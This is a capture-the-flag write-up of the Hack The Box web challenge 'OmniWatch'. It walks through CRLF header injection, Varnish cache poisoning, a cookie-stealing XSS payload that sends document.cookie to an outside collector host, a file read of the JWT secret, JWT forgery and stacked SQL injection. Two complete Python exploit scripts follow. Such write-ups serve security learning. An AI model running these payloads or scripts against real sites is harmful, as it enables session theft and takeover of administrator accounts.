astronaut
Logbook
Web Security • Research • CTF
Menu →
Aug 28, 2025 · HTB

OmniWatch

web

Summary

Description

  • Proxy/cacher: Varnish in front of Flask (port 3000) and a Zig “oracle” (port 4000).
  • Broken cache key: vcl_hash only hashes req.http.CacheKey and omits the URL, so all oracle requests can collide.
  • CRLF header injection: Zig endpoint /oracle/:mode/:deviceId reflects deviceId into the DeviceId response header without sanitization. Injecting \r\nHeader: Value adds arbitrary headers to the backend response.
  • Poisoning trick: Visit /oracle/<html-xss>/<deviceId-with-CRLF> to:
    • set CacheKey: enable (backend response header) → Varnish caches for ~10s;
    • add Content-Type: text/html so browsers parse body as HTML (not JSON);
    • body contains our <script> (since we used an HTML mode), but the cached object is served for any /oracle/json/* due to the broken hash, so the bot’s /oracle/json/{1..15} fetch executes our XSS.
  • Post-XSS: Bot leaks jwt cookie (moderator).
  • Privilege escalation:
    • LFI/path traversal: /controller/firmware POST patch=/app/jwt_secret.txt returns the HS256 secret.
    • JWT forge: Craft account_type=administrator JWT.
    • Signature guard bypass (SQLi): /controller/device/<id> builds SQL with f-string and multi=True. Use ';UPDATE signatures SET signature='<your_sig>' WHERE user_id=1;SELECT 1;-- to align DB-stored signature with your forged token.
    • Flag: /controller/admin renders os.popen("/readflag").read(), printing HTB{...}.

Analyst

Root causes

  • Varnish vcl_hash uses only req.http.CacheKey → cache keyless collisions.
  • Oracle writes DeviceId header with unsanitized path data → classic CRLF response-splitting.
  • Flask firmware preview reads arbitrary absolute path (/app/jwt_secret.txt) → LFI.
  • Device fetch uses f-string + multi=TrueSQL injection (stacked queries).
  • JWT “signature pinning” stored in DB is bypassable by SQLi.

Impact chain

CRLF resp-split → cache-poison HTML → bot XSS → JWT theft → read secret → forge admin → SQLi signature → admin route → SUID /readflag → flag.

Exploit

1) Poison cache with XSS (example)

GET /oracle/%3Cscript%3Efetch(`https://<your-collector>/?cookie=${document.cookie}`)%3C/script%3E/7%0D%0ACacheKey:%20enable%0D%0AContent-Type:%20text%2Fhtml HTTP/1.1
Host: localhost:1337
Connection: close
  • Wait ≤10s for the bot to hit /oracle/json/<rand> and exfil the cookie.

2) Use stolen moderator JWT

  • Verify it works on /controller/home.

3) Read HS256 secret

  • POST /controller/firmware with patch=/app/jwt_secret.txt → get secret.

4) Forge admin JWT

  • HS256 header+payload with {"user_id":1,"username":"adminified","account_type":"administrator"}.

5) SQLi to align signature

  • GET /controller/device/1';UPDATE signatures SET signature='<jwt_sig>' WHERE user_id=1;SELECT 1;--
  • Now the server accepts your forged admin cookie.

6) Grab flag

  • GET /controller/admin → page includes output of /readflagHTB{...}.

You already have two helper scripts:

  • Poison/watch bot: polls /controller/bot_running, poisons with CRLF, logs cache headers.
  • Escalate & dump flag: uses stolen JWT → read secret → forge admin → SQLi signature → fetch flag (with optional rollback).

Result

  • Successfully retrieved the flag: HTB{f4k3_fl4g_f0r_t35t1ng} (placeholder; on the real instance this will be randomized).
  • Demonstrated a full end-to-end chain combining CRLF response-splitting cache poisoning, headless-bot XSS, LFI, JWT forgery, and stacked SQLi to reach a SUID-backed flag reader.
#!/usr/bin/env python3
import argparse
import time
import requests
from urllib.parse import quote

# -------------------- config --------------------
DEFAULT_EXFIL = "https://lvaf27y0.requestrepo.com/?cookie=${document.cookie}"
TTL_SECONDS = 10  # Varnish TTL when CacheKey: enable

# -------------------- helpers --------------------
def log(msg):
    print(f"[{time.strftime('%H:%M:%S')}] {msg}", flush=True)

def get(url, **kw):
    try:
        return requests.get(url, timeout=8, allow_redirects=False, **kw)
    except Exception as e:
        log(f"GET {url} -> ERROR: {e}")
        return None

def poll_bot_running(base):
    r = get(f"{base}/controller/bot_running")
    if not r:
        return None
    try:
        # endpoint returns plain text: "running" or "not_running"
        return r.text.strip()
    except Exception:
        return None

def build_poison_url(base, exfil, device_id_base="7"):
    """
    We serve HTML (not JSON) with inline <script> XSS via the `mode` path segment
    AND inject response headers via CRLF in the `deviceId` path segment:
       CacheKey: enable        -> enables caching for ~10s
       Content-Type: text/html -> makes browser treat it as HTML
    """
    mode = f"<script>fetch(`{exfil}`)</script>"
    mode_enc = quote(mode, safe="")  # %3Cscript%3E...%3C%2Fscript%3E

    # CRLF-inject response headers into the DeviceId header that Zig sets:
    injected_device = (
        f"{device_id_base}"
        f"%0D%0ACacheKey:%20enable"
        f"%0D%0AContent-Type:%20text%2Fhtml"
    )

    return f"{base}/oracle/{mode_enc}/{injected_device}"

def verify_hit(base):
    """
    Fetch a random json endpoint. If poisoned, we should get:
      - X-Cache: HIT
      - Content-Type: text/html
      - body containing our <script>
    """
    # Any /oracle/json/<id> should collide on the empty CacheKey hash
    test_url = f"{base}/oracle/json/1"
    r = get(test_url)
    if not r:
        return False

    xcache = r.headers.get("X-Cache")
    ctype  = r.headers.get("Content-Type")
    body   = r.text[:200].replace("\n", " ")
    log(f"VERIFY GET {test_url} -> {r.status_code}  X-Cache={xcache}  Content-Type={ctype}")
    log(f"Body[0:200]: {body}")

    return (ctype and "text/html" in ctype and xcache == "HIT" and "<script>" in r.text)

# -------------------- main flow --------------------
def main():
    ap = argparse.ArgumentParser(description="HTB OmniWatch bot watcher + cache poisoner")
    ap.add_argument("--host", default="http://127.0.0.1", help="scheme://host (default http://127.0.0.1)")
    ap.add_argument("--port", default=1337, type=int, help="port (default 1337)")
    ap.add_argument("--exfil", default=DEFAULT_EXFIL, help="exfil URL used inside the <script> fetch(...)")
    ap.add_argument("--wait-after-running", type=float, default=2.0,
                    help="seconds to wait after bot enters 'running' before poisoning (default 2.0)")
    ap.add_argument("--loop", action="store_true", help="keep looping to catch future bot runs")
    args = ap.parse_args()

    base = f"{args.host}:{args.port}"

    log(f"Target base: {base}")
    log("Polling /controller/bot_running...")

    while True:
        status = poll_bot_running(base)
        if status is None:
            time.sleep(0.5)
            continue

        log(f"bot_running = {status}")

        if status == "running":
            # give the bot a beat to finish login (the bot sleeps ~3s after loading /login)
            time.sleep(max(0.0, args.wait_after_running))

            # -------- Poison --------
            poison_url = build_poison_url(base, args.exfil)
            log(f"POISON -> {poison_url}")
            r = get(poison_url)
            if r:
                # print debug headers
                xcache = r.headers.get("X-Cache")
                hits   = r.headers.get("X-Cache-Hits")
                devid  = r.headers.get("DeviceId")
                ctype  = r.headers.get("Content-Type")
                log(f"Poison resp: {r.status_code}  X-Cache={xcache}  Hits={hits}  DeviceId={devid}  Content-Type={ctype}")
                log(f"Poison body[0:160]: {r.text[:160].replace(chr(10),' ')}")


if __name__ == "__main__":
    main()
#!/usr/bin/env python3
import argparse, base64, hashlib, hmac, json, re, sys, time
from urllib.parse import quote
import requests

# ---------- utils ----------
def b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def mk_jwt(payload: dict, secret: str) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    p_json = json.dumps(payload, separators=(",", ":")).encode()
    h_json = json.dumps(header, separators=(",", ":")).encode()
    head = b64url(h_json)
    body = b64url(p_json)
    sig = b64url(hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest())
    return f"{head}.{body}.{sig}"

def jwt_sig(jwt: str) -> str:
    return jwt.split(".")[-1]

def log(*a): print("[*]", *a, flush=True)

def get(sess, url, **kw):
    return sess.get(url, timeout=8, allow_redirects=False, **kw)

def post(sess, url, **kw):
    return sess.post(url, timeout=8, allow_redirects=False, **kw)

# ---------- exploit steps ----------
def verify_moderator(sess, base):
    r = get(sess, f"{base}/controller/home")
    if r.status_code != 200:
        raise RuntimeError(f"moderator cookie not accepted: {r.status_code}")
    log("Moderator access OK")

def read_jwt_secret(sess, base) -> str:
    # Path traversal via firmware preview
    data = {"patch": "/app/jwt_secret.txt"}
    r = post(sess, f"{base}/controller/firmware", data=data)
    if r.status_code != 200 or not r.text.strip():
        raise RuntimeError(f"failed reading jwt secret: {r.status_code}")
    secret = r.text.strip()
    log("Read jwt_secret.txt:", secret[:16] + ("..." if len(secret) > 16 else ""))
    return secret

def sqli_update_signature(sess, base, new_sig: str, user_id: int = 1):
    # /controller/device/<id> is vulnerable: f-string + multi=True
    inj = f"1';UPDATE signatures SET signature='{new_sig}' WHERE user_id={user_id};SELECT 1;-- a"
    url = f"{base}/controller/device/{quote(inj, safe='')}"
    r = get(sess, url)
    if r.status_code not in (200, 302):
        raise RuntimeError(f"SQLi update failed: HTTP {r.status_code}")
    log("Signatures table updated for user_id", user_id)

def get_flag(sess, base) -> str:
    r = get(sess, f"{base}/controller/admin")
    if r.status_code != 200:
        raise RuntimeError(f"admin fetch failed: {r.status_code}")
    m = re.search(r"HTB\{[^\}]+\}", r.text)
    if not m:
        open("/tmp/admin.html","w").write(r.text)
        raise RuntimeError("Flag not found in admin page (saved /tmp/admin.html)")
    return m.group(0)

def main():
    ap = argparse.ArgumentParser(description="HTB OmniWatch: escalate moderator -> admin -> flag via JWT+SQLi")
    ap.add_argument("--host", default="http://127.0.0.1", help="scheme://host (default http://127.0.0.1)")
    ap.add_argument("--port", type=int, default=1337, help="port (default 1337)")
    ap.add_argument("--stolen-jwt", required=True, help="the moderator JWT you exfiltrated")
    ap.add_argument("--user-id", type=int, default=1, help="user_id of the moderator (default 1)")
    ap.add_argument("--rollback", action="store_true", help="restore original signature after grabbing flag")
    args = ap.parse_args()

    base = f"{args.host}:{args.port}"
    print(base)
    sess = requests.Session()
    # Use stolen moderator cookie
    sess.cookies.set("jwt", args.stolen_jwt, path="/")

    log("Target:", base)
    verify_moderator(sess, base)

    # 1) Read server-side JWT secret
    secret = read_jwt_secret(sess, base)

    # 2) Forge an admin JWT for same user_id
    admin_payload = {
        "user_id": args.user_id,
        "username": "adminified",
        "account_type": "administrator"
    }
    admin_jwt = mk_jwt(admin_payload, secret)
    new_sig = jwt_sig(admin_jwt)
    old_sig = jwt_sig(args.stolen_jwt)

    log("Old sig:", old_sig[:10], "...  New sig:", new_sig[:10], "...")
    # 3) SQLi to update signatures.signature to our new token's signature
    sqli_update_signature(sess, base, new_sig, user_id=args.user_id)

    # 4) Swap cookie to our forged admin token and read flag
    sess.cookies.set("jwt", admin_jwt, path="/")
    flag = get_flag(sess, base)
    log("FLAG:", flag)

    # 5) Optional rollback so bot keeps working with its original cookie
    if args.rollback:
        log("Rolling back signature to original…")
        try:
            sqli_update_signature(sess, base, old_sig, user_id=args.user_id)
            log("Rollback OK")
        except Exception as e:
            log("Rollback failed:", e)

if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        log("ERROR:", e)
        sys.exit(1)